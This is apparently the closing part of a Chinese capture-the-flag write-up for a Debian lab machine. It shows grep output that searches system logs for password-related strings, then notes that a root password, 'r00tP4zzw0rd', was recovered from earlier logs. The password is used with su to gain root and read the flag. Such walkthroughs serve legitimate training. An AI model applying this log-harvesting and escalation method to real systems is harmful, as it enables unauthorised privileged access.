./auth.log:46:2025-02-03T09:52:38.094768+01:00 hit sshd[729]: Accepted password for charlie from 192.168.1.10 port 37192 ssh2
./kern.log:82:2025-02-03T09:45:46.607149+01:00 hit kernel: [    0.005276] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:119:2025-02-03T09:45:46.607203+01:00 hit kernel: [    0.022514] Speculative Store Bypass: Vulnerable
./kern.log:297:2025-02-03T09:45:46.607334+01:00 hit kernel: [    0.370923] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:331:2025-02-03T09:45:46.607354+01:00 hit kernel: [    0.396807] ima: No TPM chip found, activating TPM-bypass!
./kern.log:350:2025-02-03T09:45:46.607417+01:00 hit kernel: [    0.489648] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:470:2025-02-03T09:45:46.607532+01:00 hit kernel: [    2.420236] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:571:2025-02-03T09:46:09.599307+01:00 hit kernel: [    0.005428] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:608:2025-02-03T09:46:09.599364+01:00 hit kernel: [    0.022678] Speculative Store Bypass: Vulnerable
./kern.log:786:2025-02-03T09:46:09.599495+01:00 hit kernel: [    0.368569] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:820:2025-02-03T09:46:09.599518+01:00 hit kernel: [    0.395226] ima: No TPM chip found, activating TPM-bypass!
./kern.log:839:2025-02-03T09:46:09.599569+01:00 hit kernel: [    0.488888] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:959:2025-02-03T09:46:09.611099+01:00 hit kernel: [    2.481281] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:1060:2025-02-03T09:59:59.616124+01:00 hit kernel: [    0.005559] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:1097:2025-02-03T09:59:59.616181+01:00 hit kernel: [    0.023292] Speculative Store Bypass: Vulnerable
./kern.log:1275:2025-02-03T09:59:59.616312+01:00 hit kernel: [    0.381849] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:1309:2025-02-03T09:59:59.616374+01:00 hit kernel: [    0.409570] ima: No TPM chip found, activating TPM-bypass!
./kern.log:1328:2025-02-03T09:59:59.616425+01:00 hit kernel: [    0.505048] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:1448:2025-02-03T09:59:59.675470+01:00 hit kernel: [    2.556606] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:1549:2025-02-03T10:14:31.844599+01:00 hit kernel: [    0.005365] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:1586:2025-02-03T10:14:31.844656+01:00 hit kernel: [    0.022731] Speculative Store Bypass: Vulnerable
./kern.log:1764:2025-02-03T10:14:31.844787+01:00 hit kernel: [    0.376414] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:1798:2025-02-03T10:14:31.844808+01:00 hit kernel: [    0.402553] ima: No TPM chip found, activating TPM-bypass!
./kern.log:1817:2025-02-03T10:14:31.844897+01:00 hit kernel: [    0.495626] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:1937:2025-02-03T10:14:31.857964+01:00 hit kernel: [    2.735579] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:2038:2025-02-03T15:43:33.663469+01:00 hit kernel: [    0.005697] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:2075:2025-02-03T15:43:33.663526+01:00 hit kernel: [    0.023053] Speculative Store Bypass: Vulnerable
./kern.log:2253:2025-02-03T15:43:33.663844+01:00 hit kernel: [    0.377040] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:2287:2025-02-03T15:43:33.663937+01:00 hit kernel: [    0.403737] ima: No TPM chip found, activating TPM-bypass!
./kern.log:2306:2025-02-03T15:43:33.663988+01:00 hit kernel: [    0.498750] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:2426:2025-02-03T15:43:33.732181+01:00 hit kernel: [    2.610661] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:2527:2025-02-03T23:04:13.749425+01:00 hit kernel: [    0.005471] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:2564:2025-02-03T23:04:13.749482+01:00 hit kernel: [    0.022848] Speculative Store Bypass: Vulnerable
./kern.log:2742:2025-02-03T23:04:13.749665+01:00 hit kernel: [    0.470047] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:2776:2025-02-03T23:04:13.749686+01:00 hit kernel: [    0.498369] ima: No TPM chip found, activating TPM-bypass!
./kern.log:2795:2025-02-03T23:04:13.749737+01:00 hit kernel: [    0.593455] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:2915:2025-02-03T23:04:13.819111+01:00 hit kernel: [    2.788234] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:3016:2025-02-03T23:15:51.823614+01:00 hit kernel: [    0.005467] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:3053:2025-02-03T23:15:51.823672+01:00 hit kernel: [    0.024177] Speculative Store Bypass: Vulnerable
./kern.log:3231:2025-02-03T23:15:51.823803+01:00 hit kernel: [    0.408691] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:3265:2025-02-03T23:15:51.823824+01:00 hit kernel: [    0.436782] ima: No TPM chip found, activating TPM-bypass!
./kern.log:3284:2025-02-03T23:15:51.823875+01:00 hit kernel: [    0.533063] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:3404:2025-02-03T23:15:51.836953+01:00 hit kernel: [    2.745818] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:3505:2025-02-03T23:21:56.666268+01:00 hit kernel: [    0.005415] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:3542:2025-02-03T23:21:56.666325+01:00 hit kernel: [    0.022919] Speculative Store Bypass: Vulnerable
./kern.log:3720:2025-02-03T23:21:56.666457+01:00 hit kernel: [    0.399963] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:3754:2025-02-03T23:21:56.666478+01:00 hit kernel: [    0.427440] ima: No TPM chip found, activating TPM-bypass!
./kern.log:3773:2025-02-03T23:21:56.666530+01:00 hit kernel: [    0.523287] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:3893:2025-02-03T23:21:56.666684+01:00 hit kernel: [    2.567433] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:3994:2025-02-03T23:36:20.545146+01:00 hit kernel: [    0.005477] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:4031:2025-02-03T23:36:20.545201+01:00 hit kernel: [    0.022787] Speculative Store Bypass: Vulnerable
./kern.log:4209:2025-02-03T23:36:20.545328+01:00 hit kernel: [    0.373341] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:4243:2025-02-03T23:36:20.545349+01:00 hit kernel: [    0.399029] ima: No TPM chip found, activating TPM-bypass!
./kern.log:4262:2025-02-03T23:36:20.545434+01:00 hit kernel: [    0.492292] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:4382:2025-02-03T23:36:20.563894+01:00 hit kernel: [    2.436214] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:4483:2025-02-03T23:40:14.702804+01:00 hit kernel: [    0.005297] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:4520:2025-02-03T23:40:14.702861+01:00 hit kernel: [    0.022499] Speculative Store Bypass: Vulnerable
./kern.log:4698:2025-02-03T23:40:14.702987+01:00 hit kernel: [    0.373482] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:4732:2025-02-03T23:40:14.703008+01:00 hit kernel: [    0.399198] ima: No TPM chip found, activating TPM-bypass!
./kern.log:4751:2025-02-03T23:40:14.703056+01:00 hit kernel: [    0.492033] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:4871:2025-02-03T23:40:14.735979+01:00 hit kernel: [    2.610698] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:4972:2025-02-03T23:47:43.609414+01:00 hit kernel: [    0.005325] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:5009:2025-02-03T23:47:43.609470+01:00 hit kernel: [    0.022364] Speculative Store Bypass: Vulnerable
./kern.log:5187:2025-02-03T23:47:43.609623+01:00 hit kernel: [    0.370600] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:5221:2025-02-03T23:47:43.609645+01:00 hit kernel: [    0.396510] ima: No TPM chip found, activating TPM-bypass!
./kern.log:5240:2025-02-03T23:47:43.609877+01:00 hit kernel: [    0.489828] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:5360:2025-02-03T23:47:43.650479+01:00 hit kernel: [    2.522706] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./kern.log:5462:2025-02-04T16:04:11.842605+01:00 hit kernel: [    0.013207] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./kern.log:5497:2025-02-04T16:04:11.842704+01:00 hit kernel: [    0.121905] Speculative Store Bypass: Vulnerable
./kern.log:5670:2025-02-04T16:04:11.843240+01:00 hit kernel: [    1.298821] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./kern.log:5704:2025-02-04T16:04:11.843304+01:00 hit kernel: [    1.370026] ima: No TPM chip found, activating TPM-bypass!
./kern.log:5723:2025-02-04T16:04:11.843371+01:00 hit kernel: [    1.466810] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./kern.log:5842:2025-02-04T16:04:12.013910+01:00 hit kernel: [    4.822390] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
grep: ./btmp: Permiso denegado
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@a0742b1a5f354a49a8e5e976590acc0d-0000000000000dd2-00062d2f519cbec6.journal: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00060a2d81869ff7-950cb9ae29ceea68.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00062d44129755a7-2bb01093fe79ff6a.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/user-1000.journal: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00060a2dabf64898-333fc89e8bd4ec01.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00062d3786ca6845-442dade4fab6d7c6.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system.journal: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00062d2f519e07d7-b0bbe5cef5db6c97.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00062d52523f2e2a-7ce3e570a7837216.journal~: coincidencia en fichero binario
grep: ./journal/6e1aca33dec44fef9ccdccf718c8150a/system@00060a2df63aad18-0f29f983d6f5561b.journal~: coincidencia en fichero binario
./syslog:82:2025-02-03T09:45:46.607149+01:00 hit kernel: [    0.005276] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./syslog:119:2025-02-03T09:45:46.607203+01:00 hit kernel: [    0.022514] Speculative Store Bypass: Vulnerable
./syslog:297:2025-02-03T09:45:46.607334+01:00 hit kernel: [    0.370923] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./syslog:331:2025-02-03T09:45:46.607354+01:00 hit kernel: [    0.396807] ima: No TPM chip found, activating TPM-bypass!
./syslog:350:2025-02-03T09:45:46.607417+01:00 hit kernel: [    0.489648] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./syslog:470:2025-02-03T09:45:46.607532+01:00 hit kernel: [    2.420236] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./syslog:680:2025-02-03T09:46:09.599307+01:00 hit kernel: [    0.005428] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./syslog:717:2025-02-03T09:46:09.599364+01:00 hit kernel: [    0.022678] Speculative Store Bypass: Vulnerable
./syslog:895:2025-02-03T09:46:09.599495+01:00 hit kernel: [    0.368569] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./syslog:929:2025-02-03T09:46:09.599518+01:00 hit kernel: [    0.395226] ima: No TPM chip found, activating TPM-bypass!
./syslog:948:2025-02-03T09:46:09.599569+01:00 hit kernel: [    0.488888] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./syslog:1068:2025-02-03T09:46:09.611099+01:00 hit kernel: [    2.481281] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./syslog:1521:2025-02-03T09:59:59.616124+01:00 hit kernel: [    0.005559] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./syslog:1558:2025-02-03T09:59:59.616181+01:00 hit kernel: [    0.023292] Speculative Store Bypass: Vulnerable
./syslog:1736:2025-02-03T09:59:59.616312+01:00 hit kernel: [    0.381849] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./syslog:1770:2025-02-03T09:59:59.616374+01:00 hit kernel: [    0.409570] ima: No TPM chip found, activating TPM-bypass!
./syslog:1789:2025-02-03T09:59:59.616425+01:00 hit kernel: [    0.505048] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./syslog:1973:2025-02-03T09:59:59.675470+01:00 hit kernel: [    2.556606] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
./syslog:2344:2025-02-03T10:14:31.844599+01:00 hit kernel: [    0.005365] Unknown kernel command line parameters "BOOT_IMAGE=/boot/vmlinuz-6.1.0-30-amd64", will be passed to user space.
./syslog:2381:2025-02-03T10:14:31.844656+01:00 hit kernel: [    0.022731] Speculative Store Bypass: Vulnerable
./syslog:2559:2025-02-03T10:14:31.844787+01:00 hit kernel: [    0.376414] alg: self-tests for CTR-KDF (hmac(sha256)) passed
./syslog:2593:2025-02-03T10:14:31.844808+01:00 hit kernel: [    0.402553] ima: No TPM chip found, activating TPM-bypass!
./syslog:2612:2025-02-03T10:14:31.844897+01:00 hit kernel: [    0.495626] x86/mm: Checked W+X mappings: passed, no W+X pages found.
./syslog:2785:2025-02-03T10:14:31.857964+01:00 hit kernel: [    2.735579] vmwgfx 0000:00:02.0: [drm] Capabilities: rect copy, cursor, cursor bypass, cursor bypass 2, alpha cursor, extended fifo, pitchlock, irq mask, gmr, traces, gmr2, screen object 2, command buffers,
grep: ./syslog: coincidencia en fichero binario
./dpkg.log:2:2023-11-15 08:56:11 install base-passwd:amd64 <none> 3.6.1
./dpkg.log:3:2023-11-15 08:56:11 status half-installed base-passwd:amd64 3.6.1
./dpkg.log:4:2023-11-15 08:56:12 status unpacked base-passwd:amd64 3.6.1
./dpkg.log:5:2023-11-15 08:56:12 configure base-passwd:amd64 3.6.1 3.6.1
./dpkg.log:6:2023-11-15 08:56:12 status half-configured base-passwd:amd64 3.6.1
./dpkg.log:7:2023-11-15 08:56:12 status installed base-passwd:amd64 3.6.1
./dpkg.log:169:2023-11-15 08:56:17 upgrade base-passwd:amd64 3.6.1 3.6.1
./dpkg.log:170:2023-11-15 08:56:17 status half-configured base-passwd:amd64 3.6.1
./dpkg.log:171:2023-11-15 08:56:17 status unpacked base-passwd:amd64 3.6.1
./dpkg.log:172:2023-11-15 08:56:17 status half-installed base-passwd:amd64 3.6.1
./dpkg.log:173:2023-11-15 08:56:17 status unpacked base-passwd:amd64 3.6.1
./dpkg.log:283:2023-11-15 08:56:19 install passwd:amd64 <none> 1:4.13+dfsg1-1+b1
./dpkg.log:284:2023-11-15 08:56:19 status half-installed passwd:amd64 1:4.13+dfsg1-1+b1
./dpkg.log:285:2023-11-15 08:56:19 status unpacked passwd:amd64 1:4.13+dfsg1-1+b1
./dpkg.log:613:2023-11-15 08:56:22 configure base-passwd:amd64 3.6.1 <none>
./dpkg.log:614:2023-11-15 08:56:22 status unpacked base-passwd:amd64 3.6.1
./dpkg.log:615:2023-11-15 08:56:22 status half-configured base-passwd:amd64 3.6.1
./dpkg.log:616:2023-11-15 08:56:22 status installed base-passwd:amd64 3.6.1
./dpkg.log:665:2023-11-15 08:56:22 configure passwd:amd64 1:4.13+dfsg1-1+b1 <none>
./dpkg.log:666:2023-11-15 08:56:22 status unpacked passwd:amd64 1:4.13+dfsg1-1+b1
./dpkg.log:667:2023-11-15 08:56:22 status half-configured passwd:amd64 1:4.13+dfsg1-1+b1
./dpkg.log:668:2023-11-15 08:56:22 status installed passwd:amd64 1:4.13+dfsg1-1+b1
grep: ./installer/cdebconf/templates.dat: Permiso denegado
grep: ./installer/cdebconf/questions.dat: Permiso denegado
grep: ./installer/Xorg.0.log: Permiso denegado
grep: ./installer/syslog: Permiso denegado
./installer/status:1912:Description: Set up users and passwords
grep: ./installer/partman: Permiso denegado
./installer/hardware-summary:130:/proc/cpuinfo: bugs            : spectre_v1 spectre_v2 spec_store_bypass swapgs taa itlb_multihit srbds mmio_stale_data retbleed gds
grep: ./private: Permiso denegado

./auth.log这得到之前日志登陆过的密码r00tP4zzw0rd

尝试切换root

拿到root.txt

BASH 
1
2
3
4
5
6
7
charlie@hit:/var/log$ su root
Contraseña:
root@hit:/var/log# id
uid=0(root) gid=0(root) grupos=0(root)
root@hit:/var/log# cat /root/root.txt
f4b9848754562bfeffbeb8cc8257048c

  1. 信息收集
    1. 服务探测
    2. .git文件泄露
  2. 用户提权
  3. Root提权
  1. 信息收集
    1. 服务探测
    2. .git文件泄露
  2. 用户提权
  3. Root提权